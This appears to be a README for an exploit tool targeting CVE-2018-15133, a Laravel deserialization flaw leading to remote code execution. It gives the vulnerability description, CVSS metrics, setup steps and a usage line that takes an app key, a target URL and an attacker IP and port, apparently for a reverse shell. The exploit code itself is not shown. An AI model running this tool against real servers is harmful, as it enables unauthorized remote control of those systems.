PRIMARY CATEGORY β†’ EXPLOITS

CVE-2018-15133 πŸ’₯ β†’ PHP Laravel Framework

Attack Vector πŸ—‘οΈ β†’ Insecure Object Deserialization to RCE

Affected Versions 🚨 β†’ 5.5.40 / 5.6.x < 5.6.40

Severity 🚩 β†’ High 8.1/10


Description

Reference

In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, RCE might occur as a result of an Unserialize call on a Potentially Untrusted X-XSRF-TOKEN value.

This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc.

The attacker must know the application key (i.e. APP KEY), which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.


CVSS Score

TL;DR β†’ CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base MetricsValues
Attack VectorNetwork
Attack ComplexityHigh
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
ConfidentialityHigh
IntegrityHigh
AvailabilityHigh

Setup

python3 -m venv ./venv
source ./venv/bin/activate
pip install -r ./requirements.txt

Usage

Help Display
python3 CVE-2018-15133.py --help
Script Execution
python3 CVE-2018-15133.py APP_KEY TARGET_LARAVEL_URL ATTACKER_IP ATTACKER_LPORT

Zoom In


Code

Reference


References

Reference IΒ Β Β Β β€’Β Β Β Β Reference IIΒ Β Β Β β€’Β Β Β Β Reference IIIΒ Β Β Β β€’Β Β Β Β Reference IV